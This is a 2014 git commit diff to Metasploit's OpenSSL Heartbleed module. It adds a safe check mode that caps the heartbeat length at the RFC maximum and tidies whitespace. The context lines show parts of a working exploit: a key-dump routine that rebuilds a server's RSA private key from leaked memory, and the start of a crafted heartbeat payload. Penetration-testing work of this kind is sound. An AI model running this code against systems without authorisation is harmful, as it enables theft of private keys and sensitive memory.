Merge pull request #1 from todb-r7/land-3274-rsa-keydump

jjarmoc · jjarmoc · commit 94618455b701 · 2014-04-17T18:53:42.000-05:00
Deconflict after rapid7#3252
diff --git a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
@@ -83,6 +83,9 @@ class Metasploit3 < Msf::Auxiliary
     'FTP'    => :tls_ftp
   }
 
+  # See the discussion at https://github.com/rapid7/metasploit-framework/pull/3252
+  SAFE_CHECK_MAX_RECORD_LENGTH = (1 << 14)
+
   def initialize
     super(
       'Name'           => 'OpenSSL Heartbeat (Heartbleed) Information Leak',
@@ -148,6 +151,16 @@ def initialize
 
   end
 
+  def check_host(ip)
+    @check_only = true
+    vprint_status "#{peer} - Checking for Heartbleed exposure"
+    if bleed
+      Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
   def run
     if heartbeat_length > 65535 || heartbeat_length < 0
       print_error("HEARTBEAT_LENGTH should be a natural number less than 65536")
@@ -157,8 +170,16 @@ def run
     super
   end
 
+  # If this is merely a check, set to the RFC-defined
+  # maximum padding length of 2^14. See:
+  # https://tools.ietf.org/html/rfc6520#section-4
+  # https://github.com/rapid7/metasploit-framework/pull/3252
   def heartbeat_length
-    datastore["HEARTBEAT_LENGTH"]
+    if @check_only
+      SAFE_CHECK_MAX_RECORD_LENGTH
+    else
+      datastore["HEARTBEAT_LENGTH"]
+    end
   end
 
   def peer
@@ -351,13 +372,13 @@ def getkeys()
       print_error('TLS callbacks currently unsupported for keydumping action') #TODO
       return
     end
-   
+
     print_status("#{peer} - Scanning for private keys")
     count = 0
 
     print_status("#{peer} - Getting public key constants...")
     n, e = get_ne
-    
+
     if n.nil? || e.nil?
       print_error("#{peer} - Failed to get public key, aborting.")
     end
@@ -373,8 +394,8 @@ def getkeys()
       end
 
       p, q = get_factors(bleed, n) # Try to find factors in mem
-     
-      unless p.nil? || q.nil?  
+
+      unless p.nil? || q.nil?
         key = key_from_pqe(p, q, e)
         print_good("#{peer} - #{Time.now.getutc} - Got the private key")
 
@@ -393,7 +414,7 @@ def getkeys()
       count += 1
     }
     print_error("#{peer} - Private key not found. You can try to increase MAX_KEYTRIES.")
-  end 
+  end
 
   def heartbeat(length)
     payload = "\x01"              # Heartbeat Message Type: Request (1)
